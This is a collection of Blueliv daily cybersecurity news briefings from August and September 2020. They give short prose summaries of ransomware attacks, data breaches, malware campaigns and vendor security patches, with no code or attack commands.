Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   September 10th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

BLURtooth vulnerability allows attacking Bluetooth encryption process

A security advisory explains that when CTKD is used for pairing dual-mode Bluetooth devices, the procedure happens only once over one of the two data transport methods. In the process, Long Term Keys / Link Keys (LTK/LK) are generated and they can be overwritten for cases where the transport enforces a higher level of security, which is what a BLUR attack takes advantage of. An attacker in the Bluetooth proximity of a vulnerable target device could spoof the identity of a paired device to overwrite the original key and access authenticated services. BLURtooth is also suitable for man-in-the-middle (MitM) type of attacks, with the attacker sits between two vulnerable devices that had been linked using authenticated pairing. Learn more >

New CDRThief malware targets VoIP Linux softswitches to steal metadata

Analysis of the malware revealed that it was specifically created for a particular Linux VoIP platform, namely Linknat VOS2009/3000 softswitches. A softswitch is a software solution acting as a VoIP server that manages traffic (audio/video/text) in a telecommunication network. It is a central element that ensures a connection between both internal and external lines. CDRThief’s purpose is to compromise VOS2009/3000 softswitches and steal call metadata from internal MySQL databases, such as IP addresses of the callers, phone numbers, start time and duration of the call, its route, and type. Learn more >

Threat actors stole $5.4 million from ETERBASE Slovak cryptocurrency exchange

Slovak cryptocurrency exchange ETERBASE disclosed a security breach, the hackers stole Bitcoin, Ether, ALGO, Ripple, Tezos, and TRON assets worth $5.4 million. The company disclosed the hack on Thursday, threat actors have stolen various cryptocurrencies from its hot wallets, it also suspended all the transactions until September 10. The company notified law enforcement authorities that are investigating into the incident, it also informed its users that it has enough capital to meet all our obligations. Learn more >

Zeppelin Ransomware Returns with New Trojan on Board

The Zeppelin ransomware has sailed back into relevance, after a hiatus of several months. A wave of attacks were spotted in August making use of a new trojan downloader. These, like an initial Zeppelin wave observed in late 2019, start with phishing emails with Microsoft Word attachments (themed as “invoices”) that have malicious macros on board. Once a user enables macros, the infection process starts. The latest campaign has affected around 64 known victims and targets, indicating a certain level of targeting. It may have started in June 4, when the command-and-control server that the malware uses was registered Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday,   September 9th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Intel fixes critical vulnerabilities on ATM and ISM platforms

Intel today addressed nine security vulnerabilities with the release of the September 2020 Platform Update, one of them being a critical flaw impacting the Active Management Technology (AMT) and Intel Standard Manageability (ISM) platforms. These issues were detailed in five security advisories published by Intel on its Product Security Center, with fixes addressing them having been delivered to customers via the Intel Platform Update (IPU) process before disclosure. Intel also provides lists of affected products and support for vulnerable products at the end of each advisory, together with contact details for reporting other security issues found to affect Intel products or tech. Learn more >

Microsoft September 2020 Patch Tuesday fixes 129 vulnerabilities

Microsoft has published today its monthly batch of security updates, also known as Patch Tuesday. This month, the OS maker patched 129 vulnerabilities across 15 products, ranging from Windows to ASP.NET. Of note is that this month, of the 129 vulnerabilities, 32 were classified as remote code execution issues, which are bugs that permit attackers to exploit vulnerable applications remotely, over a network. Of these 32, 20 also received a severity classification of "critical," the highest rating on Microsoft's scale, making the 20 vulnerabilities some of the most important bugs patched across Microsoft products this month. Learn more >

Hackers use legitimate cloud monitoring tools to take over Docker, Kubernetes platforms

In a recent attack, cybercrime group TeamTNT relied on a legitimate tool to avoid deploying malicious code on compromised cloud infrastructure and still have a good grip on it. They used an opensource tool specifically created to monitor and control cloud environments with Docker and Kubernetes installations, thus reducing their footprint on the breached server. According to researchers, this may be the first time a legitimate third-party tool is abused to play the part of a backdoor in a cloud environment, also indicating the evolution of this particular group. Learn more >

Adobe patches critical vulnerabilities of code execution in AEM, FrameMaker and InDesign

Adobe has released security updates to address twelve critical vulnerabilities that could be exploited by attackers to execute arbitrary code on systems running vulnerable versions of Adobe InDesign, Adobe Framemaker, and Adobe Experience Manager. The company also addressed important severity 18 security vulnerabilities in the Adobe Experience Manager (AEM) and the AEM Forms add-on package that could lead to arbitrary JavaScript execution in the browser via stored cross-site scripting vulnerabilities or disclosure of sensitive information via execution with unnecessary privileges. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Tuesday,   September 8th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Chilean bank BancoEstado shuts down after ransomware attack

Chilean bank BancoEstado, one of the country’s biggest banks, was hit with a ransomware attack that forced its branches to remain closed since September 7. The ransomware encrypted most of the company servers and workstations. The attack took place over the weekend, the closure of the BancoEstado breaches was announced by the bank through its Twitter account. The bank disclosed the attack on Sunday via Twitter and decided to keep branches closed to investigate the incident and recover its systems. Learn more >

Windows credentials can be stolen through Windows 10 themes

This weekend a security researcher revealed that specially crafted Windows themes could be used to perform Pass-the-Hash attacks. Pass-the-Hash attacks are used to steal Windows login names and password hashes by tricking a user into accessing a remote SMB share that requires authentication. When trying to access the remote resource, Windows will automatically try to login to the remote system by sending the Windows user's login name and an NTLM hash of their password. In a Pass-the-Hash attack, the sent credentials are harvested by the attackers, who then attempt to dehash the password to access the visitors' login name and password. Learn more >

Argentinian government hit by Netwalker ransomware

Argentina’s official immigration agency, Dirección Nacional de Migraciones, was hit by a Netwalker ransomware attack that caused the interruption of the border crossing into and out of the country for four hours. The ransomware operators also exfiltrated sensitive data from the agencies as reported by local media. The agency started receiving numerous tech support calls from checkpoints at approximately 7 AM on August 27th. Learn more >

Data breach of Webmaster Forum Digital Point exposes over 800k users

On July 1, researchers uncovered an unsecured Elasticsearch database containing over 62 million records. In total, data belonging to 863,412 Digital Point users was included in the leak. According to the team, names, email addresses, and internal user ID numbers were made publicly available. In addition, internal records and user post details were stored in the open database. While examining the database to find out who the owner was, the researchers stumbled across sets of data relating to forum members who flagged posts and the reasons behind these reports -- including allegations of "bad business dealings," spam, and other reasons, some described as appearing to be "petty and personal." Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Monday,   September 7th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Malware gang uses .NET library to generate Excel docs that bypass security checks

A newly discovered malware gang is using a clever trick to create malicious Excel files that have low detection rates and a higher chance of evading security systems. This malware gang, named Epic Manchego, has been active since June, targeting companies all over the world with phishing emails that carry a malicious Excel document. But these are not your standard Excel spreadsheets. The malicious Excel files have been bypassing security scanners with low detection rates. The malicious Excel files appear to be compiled with EPPlus into a Office Open XML (OOXML) format. This way, the files lack a specific portion of VBA code that some antivirus and email scanners look for in order to find signs of malware. Learn more >

Visa alert: Baka credit card JavaScript skimmer

Baka is a sophisticated e-skimmer developed by a skilled malware developer that implements a unique obfuscation method and loader. The Baka loader works by dynamically adding a script tag to the current page that loads a remote JavaScript file. The JavaScript URL is hardcoded in the loader script in encrypted format, experts observed that the attackers can change the URL for each victim. The e-skimmer payload decrypts to JavaScript written to resemble code that would be used to render pages dynamically. The final payload and the loader use the same encryption method, once executed, the software skimmer steals the payment card data from the checkout form. Learn more >

New strain of Thanos Ransomware unsuccessfully adds Windows MBR

"Overwriting the MBR is a more destructive approach to ransomware than usual," researchers said, "Victims would have to expend more effort to recover their files – even if they paid the ransom; fortunately, in this case, the code responsible for overwriting the MBR caused an exception because the ransom message contained invalid characters, which left the MBR intact and allowed the system to boot correctly." Even though they failed to overwrite the compromised computers' MBRs, the Thanos operators still dropped ransom note they regular way by creating HOW_TO_DECIPHER_FILES.txt text files and asking the victims to pay $20,000 to recover their data. The researchers think that the attackers gained access to the targets' networks before the ransomware payloads were deployed since they were able to find valid credentials within the samples recovered after the attack. Learn more >

Phishing adds overlay screens on legitimate sites to steal credentials

A phishing campaign deployed recently at various businesses uses the company's home page to disguise the attack and trick potential victims into providing login credentials. This is a new tactic, researchers say, that loads the legitimate page of the business and applies a fake login box on top of it. The attack starts with an email purporting to be from the company technical support team informing that some messages were blocked from reaching the inbox because they were quarantined. To create a sense of urgency, the message from the attacker states that the emails are scheduled for deletion unless the recipient reviews them and takes action to recover them. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   August 27th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

New Zealand Stock Exchange: third day with its operations canceled after DDoS attack

As a result, they have suspended all operations until the attacks end or connectivity problems can be mitigated. The group uses names like Armada Collective and Fancy Bear — both borrowed from more famous hacker groups — to email companies and threaten DDoS attacks that can cripple operations and infer huge downtime and financial costs for the targets unless the victims pay a huge ransom demand in Bitcoin. Learn more >

Microsoft Azure vulnerabilities fixed

The first of two issues reside in the Normal World application READ_IMPLIES_EXEC personality that can be exploited through specially crafted shellcode that would cause a process’ heap to become executable. The vulnerability affects version 20.07 of Azure Sphere. The second issue of them was found in /proc/thread-self/mem and can be exploited via specially crafted shellcode designed to cause a process’ non-writable memory to be written to. An attacker could supply shellcode specifically designed to modify the program and trigger the vulnerability. Learn more >

North Korean threat actors BeagleBoyz target banks worldwide

The campaign, dubbed "FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks," is an international operation designed to initiate fraudulent international money orders and ATM cash-outs. In the operation, North Korean operatives seek to gain unauthorized access to networks, point-of-sale systems, and ATMs belonging to their victims. According to the advisory, the BeagleBoyz have attempted to steal at least $2 billion since 2015 and have frequently left banking systems damaged or inoperative in their wake. Learn more >

Twitter pro-chinese propaganda botnet quote Bram Stoker’s Dracula

A research group said today it identified a Twitter botnet of around 3,000 bots that pushed pro-Chinese political spam, echoing official messaging released through state propaganda accounts. They were able to identify the botnet due to a quirk shared by the vast majority of bot accounts, most of which used quotes from Bram Stoker's Dracula book for the profile description and the first two tweets. The Dracula botnet, as they named this cluster of fake accounts, exhibited multiple similarities to past Twitter botnets that were part of Spamouflage Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Monday,   August 24th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Vulnerability in ATM vendors Diebold and NCR fixed

The flaws that could have allowed crooks to modify the amount of money they deposited on their card, so-called Deposit forgery, and make fraudulent cash withdrawals abusing of the new account balance. Once modified the account balance, the cybercriminals quickly attempt to make cash withdrawals, before the bank will detect the anomalous increase of the account balance. The two bugs, tracked as CVE-2020-9062 and CVE-2020-10124 affect respectively Diebold Nixdorf ProCash 2100xe USB ATMs running Wincor Probase software and NCR SelfServ ATMs running APTRA XFS software. Learn more >

Google Drive vulnerability could allow malware installation

The issue resides in the “manage versions” feature implemented in Google Drive allows users to upload and manage different versions of a file and in the interface that allows users to provides a new version of the files to the users. The “manage versions” feature was designed to allow Google Drive users to update an older version of a file with a new one having the same file extension, unfortunately, this is not true. The researchers, discovered that the functionally allows users to upload a new version with any file extension for any file stored on Google Drive, allowing the upload of malicious executables. Learn more >

Unskilled iranian hackers deploy Dharma ransomware

Low-skilled hackers likely from Iran have joined the ransomware business targeting companies in Russia, India, China, and Japan. They are going after easy hits, using publicly available tools in their activity. The new group is deploying Dharma ransomware. Based on forensic artifacts, this is a non-sophisticated, financially-motivated gang that is new to cybercrime. Their demand is between 1-5 Bitcoin (currently $11,700 - $59,000), which is on the lower range of ransom demand compared to other ransomware operations. Learn more >

Phishing campaing of Grandoreiro banking trojan impersonating Spain’s Agencia Tributaria

The campaign began on August 11th, 2020, when many many Spanish people receiving messages claiming to be from the Agencia Tributaria. The emails attempted to trick users into believing they were a communication from the tax agency, the messages used sender info like “Servicio de Administración Tributaria” and come from the email address contato@acessofinanceiro[.]com. The message includes a link that points to a ZIP archive that claims to contain a digital tax receipt and inform the users that they have to fill a document to be submitted to the Agencia Tributaria along with a fee to pay. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Friday,   August 21st,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Gmail flaw allowing email spoofing fixed

This issue was caused by "missing verification when configuring mail routes" as detailed by researchers. To exploit this flaw to send authenticated spoofed emails that could pass both SPF and DMARC, attackers would have to abuse a broken recipient issue in Google's mail validation rules and use an inbound email gateway to resend the message from Google's backend so that downstream mail servers would automatically trust it. Learn more >

Jenkins critical vulnerability causing data exposure fixed

This flaw has a CVSS rating of 9.4, and it influences the Eclipse Jetty versions 9.4.27.v20200227 to 9.4.29.v20200521, which is a full-featured tool; it implements a Java HTTP server and web box that is used in software frameworks. This vulnerability might enable unauthenticated threat actors to get HTTP response headers that may carry sensitive data planned for another user. Learn more >

IBM vulnerability affectig IoT devices patched

On Wednesday, IBM revealed the vulnerability, CVE-2020-15858, which it found last September in Thales' Cinterion EHS8 M2M modules. The flaw is also in related products, including the BGS5, EHS5/6/8, PDS5/6/8, ELS61, ELS81 and PLS62 modules. "This vulnerability could enable attackers to compromise millions of devices and access the networks or VPNs supporting those devices by pivoting onto the provider's backend network," researchers write. "In turn, intellectual property, credentials, passwords and encryption keys could all be readily available to an attacker". Learn more >

Maldoc malware campaign delivering the QakBot/QBot banking trojan through zipping Word documents

This particular campaign features a ZIP file; within the ZIP attachment is a Word document that includes macros within the document. These macros execute a PowerShell script that then downloads the Qakbot payload from specific URLs. This particular campaign also includes two new techniques: a bypass of the content disarm and reconstruction (CDR) technology through zipping the Word document, and a bypass of child-pattern pattern detection because Visual Basic is executed using Explorer. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   August 20th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Discovered North Korean BLINDINGCAN RAT malware

"CISA received four Microsoft Word Open Extensible Markup Language (XML) documents (.docx), two Dynamic-Link Libraries (DLLs)," the alert reads. "The .docx files attempt to connect to external domains for a download. A 32-bit and a 64-bit DLL was submitted that install a 32-bit and a 64-bit DLL named 'iconcache.db' respectively. The DLL 'iconcache.db' unpacks and executes a variant of Hidden Cobra RAT". Based on CISA and FBI malware analysis results, the BLINDINGCAN malware can also remove itself from compromised systems and clean its traces to avoid detection among other capabilities Learn more >

Windows remote access vulnerabilities fixed

For the vulnerabilities to be exploited, attackers would first need to code execution privileges on victims' devices to run a specially crafted application. KB4578013 addresses the vulnerabilities by correcting how Windows Remote Access handles memory and file operations. Customers running Windows 8.1 or Server 2012 R2 should install the update as soon as possible to be protected from attacks that could exploit this vulnerability. Learn more >

Experian South Africa data breach impacting 24M costumers

While Experian did not disclose the number of impacted users, a report from South African Banking Risk Centre (SABRIC), an anti-fraud and banking non-profit, claimed the breach impacted 24 million South Africans and 793,749 local businesses. Experian said it reported the incident to local authorities, which were able to track down the individual behind the incident. Since then, Experian said it obtained a court order, "which resulted in the individual's hardware being impounded and the misappropriated data being secured and deleted. Experian said that none of the data has been used for fraudulent purposes before being deleted and that the fraudster did not compromise its infrastructure, systems, or customer database. Learn more >

Linux systems are targeted by Lucifer cryptomining DDoS malware

When it was first spotted in May, the malware was deploying an XMRig miner on Windows computers infected using weaponized exploits targeting high and critical severity vulnerabilities or by brute-forcing machines with TCP ports 135 (RPC) and 1433 (MSSQL) open. The new Linux version comes with capabilities similar to the Windows counterpart, including modules designed for cryptojacking and for launching TCP, UCP, and ICMP-based flooding attacks. Additionally, Lucifer-infected Linux devices can also be used in HTTP-based DDoS attacks (including HTTP GET- and POST-floods, and HTTP ‘CC’ DDoS attacks). Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday,   August 19th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Small Business Owners in the US Hit with Phishing Campaign Impersonating SBA Officials

The Cybersecurity and Infrastructure Security Agency (CISA) is currently tracking an unknown malicious actor who is spoofing the Small Business Administration (SBA) COVID-19 loan relief webpage via phishing emails. These emails include a malicious link to the spoofed SBA website that the cyber actor is using for malicious re-directs and credential stealing. Learn more >

FritzFrog P2P botnet malware attacks SSH servers worldwide to mine Monero

The attack has already managed to infiltrate over 500 servers in the U.S. and Europe, of universities and a railway company. The advanced nature of FritzFrog lies in its proprietary and fileless P2P implementation written from scratch. The malware assembles and executes the malicious payload entirely in-memory, making it volatile. Moreover, its custom P2P implementation means, there is no single Command & Control (C&C) server sending instructions to FritzFrog. It's decentralized and self-sufficient. Despite the aggressive brute-force tactics employed by FritzFrog to breach SSH servers, it is strangely efficient by targeting a network evenly. Learn more >

Microsoft is removing insecure Cloud App Security cipher suites

Microsoft today announced that some insecure cipher suites currently supported by Microsoft Cloud App Security (MCAS) will be removed later this year. After that happens, Redmond will no longer provide support for connections using these non-secure cipher suites and they will no longer work as expected. To prepare for this incoming change, "[c]ustomers should ensure that all client-server and browser-server combinations are using supported suites in order to maintain the connection to Microsoft Cloud App Security". Learn more >

New Attack Alert: Duri

Duri leverages HTML smuggling to deliver malicious files to users’ endpoints by evading network security solutions such as sandboxes and legacy proxies. Isolation prevents this attack from infecting the endpoint. According to their observations, the Duri campaign started in the beginning of July and is currently active. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Tuesday,   August 18th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Notepad++ text editor banned in China

"I reject the idea that our given free speech rights are restrained by an authoritarian country. Notepad++ stands with the people of Hong Kong," the Stand with Hong Kong blog post stated. When trying to download the Notepad++ program using China-based web browsers, downloaders are greeted with interstitial messages saying the site has been blocked. "I am not surprised about their reaction. But since the free speech is basic right of everyone, I won't keep silent," creator of the software said. Learn more >

Cryptomining bot TeamTNT steals AWS credentials

The group would access the API and deploy servers inside the Docker install that would run DDoS and crypto-mining malware. According to researchers, the TeamTNT botnet is now targeting also misconfigured Kubernetes installations. The botnet operators have added a new feature that scans the underlying infected servers for any Amazon Web Services (AWS) credentials. The TeamTNT bot borrows the code from another worm tracked as Kinsing, which was spotted in April while targeting Docker clusters to deploy crypto-miners. Learn more >

Microsoft fixes Zero Day flaw reported 2 years ago

This vulnerability is tracked as CVE-2020-1464 and is described by Microsoft as a spoofing vulnerability in how Windows validates signature files. It was later noted in a blog post by some security researchers that this update is for a bug reported two years ago on August 18th, 2018, and that Microsoft originally stated they would not be fixing. With the patch for CVE-2020-1464, Windows will no longer considered MSI files to be signed if they have been tampered by having a JAR file appended to it. Learn more >

Cruise line operator Carnival in danger after ransomware attack

As part of the attack, Carnival states data was likely stolen and could lead to claims from those affected by the potential data breach: "Nonetheless, we expect that the security event included unauthorized access to personal data of guests and employees, which may result in potential claims from guests, employees, shareholders, or regulatory agencies,". The filing does not indicate the ransomware operation that compromised their network, and there are close to twenty different gangs that steal and leak unencrypted files as part of their attacks. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Monday,   August 17th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Canadian govt accounts hijacked to steal COVID-19 funds

A statement from the Treasury Board of Canada Secretariat on Saturday revealed that the attackers had used tried-and-tested credential stuffing techniques to hijack GCKey and Canada Revenue Agency (CRA) accounts. The government claimed that 9041 users were affected by the campaign, and in a third of cases services were accessed illegally. Around 5500 CRA accounts were targeted by this and a separate credential stuffing attack on the tax office, it added. Affected GCKey accounts were cancelled as soon as the threat was discovered and departments are contacting users whose credentials were revoked to provide instructions on how to receive a new GCKey Learn more >

SANS shares the Indicators of Compromise for phishing attack that led to data breach

Some of the forwarded emails contained a total of approximately 28,000 records of personal information (PII) for SANS members. When disclosing the attack, SANS stated that they would release information that they discover about the attack to benefit the cybersecurity community. Yesterday, SANS released the indicators of compromise (IOCs) for their phishing attack so that other organizations can make sure they were not affected. Learn more >

Technology giant Konica Minolta hit by RansomEXX ransomware attack

After some customers stated that their Konica contacts indicated a breach caused the outage, a source shared a copy of the ransom note used in the attack on Konica Minolta to researchers, named '!!KONICA_MINOLTA_README!!.txt. It was also discovered that the devices in the company were encrypted, and files had the '.K0N1M1N0' extension appended to them. This ransom note belongs to a relatively new ransomware called RansomEXX, which is human-operated and entails threat actors compromising a network, and over time, spreading to other devices until they gain administrator credentials. Learn more >

PurpleWave – A New Infostealer from Russia

A new Infostealer malware called PurpleWave was found being advertised and sold on Russian cyber-crime forums for $68 US. An Infostealer is a type of malware that gathers information from the infected system and is able to install more malware once inside it. Purplewave is capable of stealing cookies, passwords and credit cards. It also can steal files, take screenshots and install additional malware. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   August 13th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Vulnerability in 4G Voice over LTE (VoLTE) protocol used to eavesdrop on voice calls

For each call, mobile operators must select an encryption key (called a stream cipher) to secure the call. Normally, the stream cipher should be unique for each call. However, a team of academics from the Ruhr University in Bochum, Germany, has discovered that not all mobile operators follow the 4G standard to the letter of the law. Researchers say that while mobile operators do, indeed, support encrypted voice calls, many calls are encrypted with the same encryption key. In their research, academics said that the problem usually manifests at the base station (mobile cell tower) level, which, in most cases, reuse the same stream cipher, or use predictable algorithms to generate the encryption key for voice calls. Learn more >

Coronavirus ventilator manufacturer Boyce Technologies targeted by ransomware

The cybercriminals have threatened that more information will be disclosed next week through the site if an undisclosed crypto ransom is not paid by the firm. Boyce Technologies is well-known for its work in designing and manufacturing FDA-approved low-cost ventilators in just 30 days during the first months of the COVID-19 pandemic, amid the big demand for the machines across New York hospitals. Prior to the attack the company was making 300 units a day with the help of the robots built by the company. Learn more >

Alexa voice assistant, exploitable to hand over user data

Users are able to extend Alexa’s capabilities by installing “skills” – additional functionality developed by third-party vendors which can be thought of as apps – such as weather programs and audio features. The smart assistant, which is found in devices such as the Amazon Echo and Echo Dot -- with over 200 million shipments worldwide -- was found to be vulnerable to attackers seeking user personally identifiable information (PII) and voice recordings due to its subdomains being susceptible to Cross-Origin Resource Sharing (CORS) misconfiguration and cross-site scripting (XSS) attacks. Learn more >

Color by numbers: inside a Dharma ransomware-as-a-service attack

The actors using this particular RaaS are equipped with a package of pre-built scripts, internal Windows tools, legitimate third-party “freeware” software, well-known security tools and publicly-available exploits, integrated together through bespoke PowerShell, batch, and AutoIT scripts. This pre-packaged toolkit, combined with back-end technical support, significantly extends the reach of the Dharma RaaS operators, allowing them to profit while their affiliates do the hands-on-keyboard work of breaching networks, dropping ransomware, and managing “customer service” with the victims. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday,   August 12th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Customer data breached at Michigan State online store

Hackers have breached Michigan State University’s online store, gaining access to customer credit card numbers and other personal information, the university said. The university on Monday began notifying customers who may have been affected by the hack. Michigan State’s information security team has corrected the site’s vulnerabilities that allowed the intrusion between Oct. 19, 2019 and June 26, officials said. Learn more >

Google Chrome bug would let hackers bypass CSP protection

Tracked as CVE-2020-6519 (rated 6.5 on the CVSS scale), the issue stems from a CSP bypass that results in arbitrary execution of malicious code on target websites. Some of the most popular websites, including Facebook, Wells Fargo, Zoom, Gmail, WhatsApp, Investopedia, ESPN, Roblox, Indeed, TikTok, Instagram, Blogger, and Quora, were susceptible to the CSP bypass. Interestingly, it appears that the same flaw was also highlighted by Tencent Security Xuanwu Lab more than a year ago, just a month after the release of Chrome 73 in March 2019, but was never addressed until PerimeterX reported the issue earlier this March. Learn more >

Information security training organization falls victim to phishing attack

"We have identified a single phishing e-mail as the vector of the attack. As a result of the e-mail, a single employee's email account was impacted. Aside from the affected user, we currently believe that no other accounts or systems at SANS were compromised," states the SANS data incident notification. The threat actor then proceeded to configure a rule that forwarded all email received in this account to an "unknown external email address" and installed a malicious Office 365 add-on. Learn more >

Adobe Acrobat and Reader affected by critical flaws

The patches have been created for Acrobat DC, Acrobat Reader DC, Acrobat and Classic 2020, Acrobat Reader 2020, Acrobat/Reader 2017, and Acrobat/Reader 2015 on Windows and macOS machines. The important vulnerabilities range from sensitive data exposure, security bypass, stack exhaustion, and out-of-bounds read problems. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Tuesday,   August 11th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Threat actors hijack Tor exit nodes to perform SSL stripping attacks

According to a report published on Sunday the group managed 380 malicious Tor exit relays at its peak, before the Tor team made the first of three interventions to cull this network. The primary goal of these SSL stripping attacks was to allow the group to replace Bitcoin addresses inside HTTP traffic going to Bitcoin mixing services. Learn more >

Agent Tesla | Old RAT Uses New Tricks to Stay on Top

The new variants of Agent Tesla RAT now come with modules dedicated to stealing credentials from applications including popular web browsers, VPN software, as well as FTP and email clients. This malware is currently very popular with business email compromise (BEC) scammers who use it to infect their victims for recording keystrokes and taking screenshots of compromised machines. Learn more >

New zero-day RCE vBullentin bug patched

The zero-day is a bypass for a patch from a previous vBulletin zero-day — namely CVE-2019-16759, disclosed in September 2019. The previous zero-day allowed attackers to exploit a bug in the vBulletin template system to run malicious code and take over forums without needing to authenticate on the victim sites (a type of bug called a pre-auth RCE). However, a researcher said he found a simple way to bypass the patch and continue to exploit the same CVE-2019-16759 vulnerability Learn more >